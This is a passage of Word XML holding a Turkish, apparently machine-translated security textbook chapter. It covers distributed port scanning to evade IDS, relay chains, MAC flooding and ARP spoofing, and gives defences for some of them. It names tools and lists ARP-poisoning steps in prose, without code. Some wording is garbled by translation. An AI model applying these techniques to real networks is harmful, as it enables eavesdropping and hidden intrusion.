      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Port tarama, hangi portların dinleme servislerinin olduğunu belirlemek için hedef sistemdeki çeşitli portlara paket gönderme işlemidir. Hangisinin açık olduğunu görmek için hedef sistemin kapılarını çalmaya benzer. Saldırganın hedef sistemde hangi bağlantı noktalarının açık olduğunu bilmesiyle, makinede çalışan hizmetler hakkında iyi bir fikri vardır. Saldırgan daha sonra bu açık bağlantı noktalarıyla ilişkili hizmetlere bir saldırıya odaklanabilir. Ayrıca, hedef sistemdeki her bir açık bağlantı noktası, saldırgan için olası bir giriş noktasını belirtir. Saldırgan, makineyi tarayabilir ve TCP bağlantı noktası 25 ve UDP bağlantı noktası 53'ün açık olduğunu belirleyebilir. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:lastRenderedPageBreak/>
        <w:t>sonuç, saldırgana makinenin muhtemelen bir posta sunucusu ve DNS sunucusu olduğunu söyler. Çok sayıda geleneksel portscanning aracı mevcut olsa da, en güçlülerinden biri (bugüne kadar) http://www.insecure.org adresinde bulunan Nmap aracıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Bir port taraması genellikle daha derinlemesine bir saldırının öncüsü olduğundan, güvenlik personeli port taramalarını erken uyarı göstergesi olarak algılamak için genellikle IDS araçlarını kullanır. Çoğu IDS, port taramalarını tanımak için özel yetenekler içerir. Bir paket bir bağlantı noktasına giden belirli bir kaynaktan gelir, ardından aynı kaynaktan başka bir bağlantı noktasına giden başka bir paket takip eder, ardından başka bir bağlantı noktası için başka bir paket gelirse, IDS bu paketleri taramanın tespit edilmesi için hızlı bir şekilde ilişkilendirebilir. Bu trafik şekli, port numaralarının kaynak ağ adresine göre çizildiği, Ek 11.1'in sol tarafında gösterilmiştir. IDS'ler böyle bir taramayı kolayca tespit edebilir ve zil ve ıslık çalabilir (veya yöneticiye e-posta gönderebilir). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Şimdi bir saldırgan taramayı gerçekleştirmek için dağıtılmış bir yaklaşım kullandığında ne olacağını düşünün. Saldırgan, tek bir adresten gelen bir paket barajı yerine, taramaya katılmak için birçok sistemi yapılandırır. Her tarama makinesi yalnızca bir veya iki paket gönderir ve sonuçları alır. Birlikte çalışarak, tarama makineleri, hedef sistemdeki tüm ilginç portları kontrol edebilir ve sonuçlarını saldırgan tarafından ilişkilendirilmek üzere gönderebilir. Geleneksel port taramasının tanıdık şeklini arayan bir IDS saldırıyı tespit etmeyecektir. Bunun yerine, gelen paketlerin düzeni, Ek 11.1'in sağ tarafında gösterildiği gibi, daha rastgele görünecektir. Bu şekilde, dağıtılmış tarama, saldırıların tespitini daha zorlaştırır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13AB696D" wp14:editId="31F828E8">
            <wp:extent cx="5689159" cy="2311400"/>
            <wp:effectExtent l="0" t="0" r="698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6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5694366" cy="2313516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Elbette bir IDS sistemi, kaynak adres yerine hedef adrese (yani paketlerin gittiği yer) odaklanarak dağıtılmış bağlantı noktası taramasını algılayabilir. Birden fazla sistem birdenbire tek bir makinedeki birkaç bağlantı noktasına paketleri gönderirse, bir IDS bağlantı noktası taramasının devam ettiğini tespit edebilir. Ancak saldırgan, dağıtılmış bir tarama yaparak algılama için çıtayı yükseltmiştir. Dağıtılmış tarama daha uzun bir süre boyunca gerçekleştirilirse (örneğin, bir hafta veya ay), bir IDS'den kurtulma şansı bir saldırgan için oldukça iyidir. Dağıtılmış bağlantı noktası taramaları, bir saldırganın izini sürmek için çok daha zordur, çünkü tarama, hiçbiri saldırganın sahip olmadığı pek çok farklı sistemden gelir. Birkaç dağıtılmış bağlantı noktası tarama aracı mevcuttur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t xml:space="preserve"> Saldırgan, tarama yapmak için Web sunucularına yerleştirilebilecek küçük bir komut dosyası olan açıklayıcı olarak adlandırılan Phpdistributedportscanner'ı kullanabilir. Saldırganlar PHP etkin bir Web sunucusunu ele geçirdiklerinde, komut dosyasını sunucuya yerleştirebilir ve diğer sistemleri taramak için kullanabilirler. Saldırgan, HTTP isteklerini kullanarak çeşitli Web sunucularında çalışan ayrı tarama komut dosyaları ile etkileşime girer. Her şey Web tabanlı olduğundan, dağıtılmış bağlantı noktası taramalarının çalıştırılması oldukça basittir. Bu tarama aracı </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:lastRenderedPageBreak/>
        <w:t>http://www.digitaloffense.net:8000/phpDistributedPortScanner/ adresinde bulunabilir. Diğer dağıtılmış bağlantı noktası tarayıcıları, Dscan (http://packetstorm.securify.com/distributed adresinde bulunabilir) ve SIDEN (http://siden.sourceforge.net adresinde bulunabilir) gibi bir istemci / sunucu mimarisine dayanma eğilimindedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc10010043"/>
      <w:r>
        <w:t xml:space="preserve">2.5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Dağıtılmış </w:t>
      </w:r>
      <w:r>
        <w:t>Port</w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve"> Taraması</w:t>
      </w:r>
      <w:r>
        <w:t>na Karşı Savunma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Dağıtılmış bağlantı noktası taramasına karşı en iyi savunma, birinin sistemindeki tüm gereksiz hizmetleri kapatmaktır. Bir makinenin tek amacı, HTTP ve HTTPS ile iletişim kuran bir Web sunucusunu çalıştırmaksa, sistemin sadece 80 numaralı TCP portu ve 443 numaralı TCP portu açık olmalıdır. Bir web sunucusu ile aynı makinede çalışan bir posta sunucusuna ihtiyaç duymuyorsa, posta sunucusunun devre dışı bırakılması için sistem yapılandırılmalıdır. Makinede X Pencere sistemi gerekli değilse, kapatın. Diğer tüm servisler kapatılmalı, bu diğer bütün portları kapatacaktır. Bir kişi, güvenli sunucular oluşturmak için bir kuruluştaki tüm sistem yöneticileri için adım adım bir işlem sağlayan güvenli bir yapılandırma belgesi geliştirmelidir. Ek olarak, IDS problarının güncel tutulmasını sağlamalıdır. Çoğu IDS satıcısı düzenli olarak yeni saldırı imzaları dağıtır - genellikle ayda bir kez. Yeni bir saldırı imzası kümesi mevcut olduğunda, kişi hızlı bir şekilde test etmeli ve IDS problarına dağıtmalıdır, böylece en son saldırı kümesini tespit edebilsinler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc10010044"/>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Röle Saldırıları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00642E9D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Son bir dağıtılmış saldırı tekniği, saldırının gerçek kaynağını gizlemek için bilgilerin makineden makineye İnternet üzerinden aktarılmasını içerir. Tahmin edilebileceği gibi, çoğu saldırgan yakalanmak istemiyor. Saldırgan ve hedef arasında fazladan dolaylı aktarım katmanları kurarak saldırgan yakalanmaktan kaçınabilir. Bir saldırganın tüm dünyada bulunan ve İnternet üzerinden erişilebilen yarım düzine makineyi alıp yeni bir sisteme saldırmak istediğini varsayalım. Saldırgan altı sistemde paket yönlendirici programları ayarlayabilir. İlk makine, belirli bir porttan alınan paketleri ikinci sisteme iletir. İkinci sistem daha sonra onları üçüncü sisteme yönlendirir ve böylece yeni hedefe ulaşılana kadar devam eder. Her sistem, saldırganın trafiği için bir röle zincirinde bir link görevi görür. Saldırı tespit edildiğinde ve tespit edildiğinde, soruşturma ekibinin, saldırganı bağlamadan önce her röle noktasından saldırıyı izlemesi gerekecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Saldırganlar genellikle dünya genelinde çok sayıda sistemden oluşan röle zincirleri kurarlar. Ek olarak, diğer araştırmacılara da saldırganlar saldırganlar sık ​​sık röle zincirinin bağlantılarının bulunduğu ülkeler arasında insan dili ve jeopolitik ilişkilerde büyük bir değişiklik olduğundan emin olmaya çalışır. Örneğin, ilk röle Amerika Birleşik Devletleri'nde, ikincisi ise Çin'de olabilir. Üçüncüsü Hindistan’da olabilir, dördüncüsü Pakistan’da. Sonunda, zincir İran’da ABD’de bulunan bir makineye saldırı için son buluyor. Aktarma zincirinin her aşamasında, araştırmacıların insan dilindeki dramatik değişimler, ülkeler arasındaki dostluktan daha az ilişkiler ve devasa kanun uygulayıcı yargı meseleleriyle mücadele etmeleri gerekecekti. Röle saldırıları genellikle, http://www.l0pht.com/users/10pht/ nc110.tgz adresinde UNIX ve http: //www.l0pht adresindeki Windows NT için kullanılabilen Netcat adlı çok esnek bir araç kullanılarak gerçekleştirilir. com / ~ kaynak / netcat'in /. Röle oluşturmanın bir diğer popüler aracı ise http: // oh.verio.com/</w:t>
      </w:r>
      <w:r>
        <w:t>~sammy/hacks adresinde bulunur</w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc10010045"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Röle Saldırılarına Karşı Savunma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00642E9D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Geçiş saldırılarındaki eylemlerin çoğu bir kuruluşun kendi ağının dışında gerçekleştiği için, bu tür saldırıları önlemek için yapılabilecek çok az şey var. Biri saldırıya uğramadan önce saldırganların paketlerini bir grup makineden geçirmesini engelleyemez. En iyi bahis, güvenlik yamaları uygulayarak ve tüm gereksiz hizmetleri kapatarak sistemlerin güvenli olduğundan emin olmaktır. Ek olarak, bu tür saldırılara ilişkin soruşturmalarda, yetkililerin yasaların uygulanması ile işbirliği yapılması önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc10010046"/>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Aktif Snifing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00642E9D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Snifing, yeni yeteneklerle hızla genişleyen bir başka eski tekniktir. Geleneksel koklayıcılar bir ağdan trafik toplayan basit araçlardır. Kullanıcı, bilgisayara ya da başka bir sisteme yönelik olsun olmasın, bilgisayarın ağ arabiriminden geçen tüm verileri toplayan bir bilgisayara bir sniffer programı yükler. Ağ yöneticileri tarafından kullanıldığında, koklayıcılar ağın sorunlarını gidermeye yardımcı olmak için hatalı paketleri yakalayabilir. Saldırganlar tarafından kullanıldığında, sniffers, şifreler, dosyalar, e-postalar veya ağda iletilen herhangi bir şey gibi ağdan hassas verileri alabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc10010047"/>
      <w:r>
        <w:t xml:space="preserve">5.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Ge</w:t>
      </w:r>
      <w:r>
        <w:t>leneksel Snif</w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>ﬁng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t xml:space="preserve">Geleneksel bıçaklama araçları pasiftir; trafiğin ağdan geçmesi ve geldiğinde verileri toplaması için sabırla beklerler. Bu pasif teknik bazı ağ tipleri için iyi çalışıyor. Çok sayıda yerel alan ağı (LAN) oluşturmak için kullanılan popüler bir teknoloji olan Geleneksel Ethernet, bir yayın ortamıdır. Ethernet hub'ları geleneksel Ethernet LAN'ları oluşturmak için kullanılan cihazlardır. LAN üzerindeki herhangi bir sisteme gönderilen tüm trafikler, LAN üzerindeki tüm makinelere yayınlanır. Geleneksel bir sniffer bu nedenle aynı LAN'daki diğer sistemler arasında giden herhangi bir veriyi yakalayabilir. Geleneksel bir saldırı saldırısında, saldırgan LAN'a bir sistem devraldı, bir sniffer taktı ve aynı LAN üzerindeki diğer makineler için tutulan trafiği topladı. En iyi geleneksel sniffer'lerden bazıları Snort (http://www.snort.org adresinde bulunur) ve Snif (t (http://reptile.rug.ac.be/~coder/snif ﬁ t / snif ﬁ t.html adresinde bulunur). Geleneksel sniffers'a karşı yaygın olarak kullanılan savunmalardan biri, anahtarlamalı bir LAN'dir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Bir yayın aracı görevi gören bir Ethernet hub'ının aksine, Ethernet anahtarı yalnızca LAN üzerindeki amaçlanan hedefine veri gönderir. LAN üzerindeki başka hiçbir sistem verileri göremez, çünkü Ethernet anahtarı verileri uygun hedefe ve başka hiçbir yere göndermez. Geleneksel sniffers'ı kandırmak için yaygın olarak kullanılan bir başka teknik ise transit halindeki verileri şifrelemektir. Saldırganlar şifreleme anahtarlarına sahip değilse, ağdan alınan verilerin içeriğini belirleyemezler. En popüler şifreleme protokollerinden ikisi, Web trafiğini güvenliğini sağlamak için en sık kullanılan Güvenli Yuva Katmanı (SSL) ve sistemlere komut satırı kabuğu erişimini korumak için en sık kullanılan Güvenli Kabuk'tur (SSH).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc10010048"/>
      <w:r>
        <w:t xml:space="preserve">5.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Aktif Snifing ile Antenin Yükseltilmesi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t xml:space="preserve">Pasif keskin nişancılara karşı savunmaları dağıtmada etkili ve faydalı olsalar da, saldırganlar onları engellemek için çeşitli teknikler geliştirmiştir. Topluca aktif engelleme olarak bilinen bu teknikler, bir saldırganın başka türlü çözülmemesi gereken </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:lastRenderedPageBreak/>
        <w:t>verileri almasına izin vermek için ağa trafik enjekte etmeyi içerir. Mevcut olan en yetenekli aktif tarama programlarından biri, http://www.monkey.org/~dugsong/dsniff/ adresinde bulunan Dsniff'tir. Biri, Dsniff’in, bir ağa trafik enjekte ederek, MAC adresleri sızması, sahte ARP trafiği, sahte DNS yanıtları ve SSL’ye karşı ortadaki saldırılar dahil olmak üzere çeşitli ağlara enjekte edilmesi için çeşitli yöntemleri araştırır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc10010049"/>
      <w:r>
        <w:t xml:space="preserve">5.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:t>MAC Adreslerinin Taşması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>Bir Ethernet anahtarı, medya erişim kontrolü (MAC) adresine dayanarak bir LAN üzerinde trafiği nereye göndereceğinizi belirler. MAC adresi, dünyadaki her Ethernet kartına atanan benzersiz bir 48 bitlik sayıdır. MAC adresi, LAN'a bağlı her sistem için benzersiz ağ arayüzü donanımını gösterir. Bir Ethernet anahtarı, anahtardaki hangi fişlerin hangi MAC adresleriyle ilişkili olduğunu öğrenmek için LAN üzerindeki trafiği izler. Örneğin, anahtar, bir numaralı fiş üzerindeki MAC adres AA: BB: CC: DD: DD: EE: FF'den gelen trafiği görecektir. Anahtar bu bilgiyi hatırlayacak ve bu MAC adresi için yazılan verileri sadece anahtardaki ilk fişe gönderecektir. Benzer şekilde, anahtar LAN'daki diğer ağ arayüzleriyle ilişkili MAC adreslerini otomatik olarak algılayacak ve onlara uygun verileri gönderecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>En basit ve aktif tarama tekniklerinden biri, LAN'ı sahte MAC adreslerine sahip trafiğe maruz bırakmayı içerir. Saldırgan, rastgele MAC adresleri olan paketler üretmek ve bunları switch'e beslemek için LAN üzerindeki bir makineye kurulu bir programı kullanıyor. Anahtar, gelen tüm MAC adreslerini hatırlamaya çalışacaktır. Sonunda, anahtarın bellek kapasitesi sahte MAC adresleriyle tükenir. Hafızası arttığında, bazı anahtarlar LAN'a bağlı tüm makinelere trafiğin gönderildiği bir moda geçer. Bu nedenle MAC modunu kullanarak bir saldırgan bir anahtarı bombalayabilir, böylece anahtar tüm LAN'lardaki tüm makinelere gönderir. Saldırgan daha sonra yerel ağdaki verileri almak için geleneksel bir dinleyiciyi kullanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18460980" wp14:editId="51E73656">
            <wp:extent cx="5943600" cy="28117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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5950660" cy="2815120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc10010050"/>
      <w:r>
        <w:t>5.4. Sahte ARP Trafiği</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00642E9D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t xml:space="preserve">Bazı anahtarlar MAC altındaki bir modda, tüm trafiği LAN üzerindeki tüm sistemlere gönderdikleri bir modda başarısız olurken, diğer anahtarlar açılmaz. Bir kaynak sırasında, bu anahtarlar, LAN üzerinde otomatik olarak belirlenen ilk MAC adresleri kümesini hatırlar ve bu adresleri alan süresi boyunca kullanır. Saldırgan, anahtarı bastırmak için bir MAC düğmesini başlatamaz. Bununla birlikte, saldırgan, </w:t>
      </w:r>
      <w:r w:rsidRPr="00642E9D">
        <w:lastRenderedPageBreak/>
        <w:t>Adres Çözümleme Protokolü'ne (ARP) dayanarak başka tür bir trafik enjekte ederek hala böyle bir LAN'a zarar verebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E9D">
        <w:t>ARP, Internet Protokolü (IP) adreslerini LAN üzerindeki MAC adresleriyle eşlemek için kullanılır. Bir makine LAN üzerindeki başka bir sisteme gönderilecek verilere sahip olduğunda, hedefin IP adresi için bir paket oluşturur; Bununla birlikte, IP adresi sadece hedef makinedeki bir yapılandırma ayarıdır. Paketin gönderileceği gönderen makinenin, LAN üzerinde hangi donanım aygıtına gönderileceğini nasıl belirleyeceği? ARP cevaptır. LAN üzerindeki bir makinenin IP adresi 10.1.2.3 için belirlenmiş bir pakete sahip olduğunu varsayalım. Paketli makine, hangi ağ arayüzünün IP adresi 10.1.2.3 ile ilişkili olduğunu soran LAN üzerinde bir ARP isteği gönderir. Bu IP adresine sahip makine, özünde, “IP Adresi 10.1.2.3, MAC adresi AA: BB: CC: DD: DD: EE: FF.” İle ilişkilendirilir. Diyerek bir ARP yanıtı iletecektir. IP adresinin MAC adresine eşleştirilmesini, ileride başvurmak üzere ARP tablosu adı verilen yerel bir tabloda saklar. Paket daha sonra bu MAC adresi ile ağ arayüzüne teslim edilecektir. Bu şekilde, ARP IP adreslerini MAC adreslerine dönüştürmek için kullanılır, böylece paketler LAN üzerindeki uygun ağ arayüzüne iletilebilir. LAN üzerinde ek ARP trafiği ihtiyacını en aza indirmek için sonuçlar sistemin ARP tablosunda saklanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>ARP, "bedava ARP" olarak adlandırılan bir yetenek için destek içerir. Ücretsiz ARP ile, hiçbir makine bir ARP isteği göndermemiş olsa da, bir makine bir ARP yanıtı gönderebilir. LAN'daki performansı iyileştirmeye yardımcı olmak için çoğu sistem ARP tablolarındaki ARP girişleri için susamıştır. Başka bir aktif snifing formunda, bir saldırgan, Ek 11.2'de gösterildiği gibi değiştirilmiş bir LAN'ı sniflemek için trafiği yönlendirmek için sahte ARP mesajlarını kullanır. Sergi için, saldırganın LAN'daki makinesi siyah bir şapka ile belirtilir. Ek 11.2'de gösterilen bu saldırının adımları:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>1. Saldırgan, saldırganın LAN üzerindeki makinede IP iletimini etkinleştirir. Anahtarla siyah şapka makinesine yönlendirilen tüm paketler, LAN için varsayılan yönlendiriciye yönlendirilecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>2. Saldırgan, hedef makineye bedava bir ARP mesajı gönderir. Saldırgan, bu makineden dış dünyaya gönderilen trafiği koklamak istiyor. Ücretsiz ARP mesajı, LAN için varsayılan yönlendiricinin IP adresini, saldırganın kendi makinesinin MAC adresine eşleyecektir. Hedef makine bu sahte ARP mesajını kabul eder ve ARP tablosuna girer. Hedefin ARP tablosu şimdi yanlış girdiyle zehirlendi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>3. Hedef makine, dış dünya için hedeflenmiş trafik gönderir. LAN için varsayılan yönlendiriciyle ilişkili MAC adresini belirlemek için ARP tablosuna başvurur. ARP tablosunda bulunan MAC adresi saldırganın adresidir. Dış dünya için tüm veriler saldırganın makinesine gönderilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>4. Saldırgan, trafiği hattan kokluyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
